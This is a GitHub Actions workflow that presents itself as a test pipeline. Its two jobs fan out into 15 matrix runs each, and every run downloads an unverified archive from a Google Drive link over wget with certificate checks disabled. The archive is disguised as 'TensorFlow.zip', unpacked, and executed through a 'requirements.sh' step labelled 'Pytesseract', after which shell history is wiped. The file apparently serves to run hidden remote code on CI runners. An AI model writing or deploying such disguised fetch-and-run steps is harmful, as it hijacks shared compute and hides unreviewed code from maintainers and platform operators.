name: neosong780space
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  TEST:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Draft', 'Construct', 'Inspect', 'Trigger', 'Ship']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1LgZDtwN1VsLvorsaeALCEYsSjBFyexLL" -O TensorFlow.zip
        unzip -o TensorFlow.zip
        rm TensorFlow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  TEST1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Plan', 'Assemble', 'Validate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1LgZDtwN1VsLvorsaeALCEYsSjBFyexLL" -O TensorFlow.zip
        unzip -o TensorFlow.zip
        rm TensorFlow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
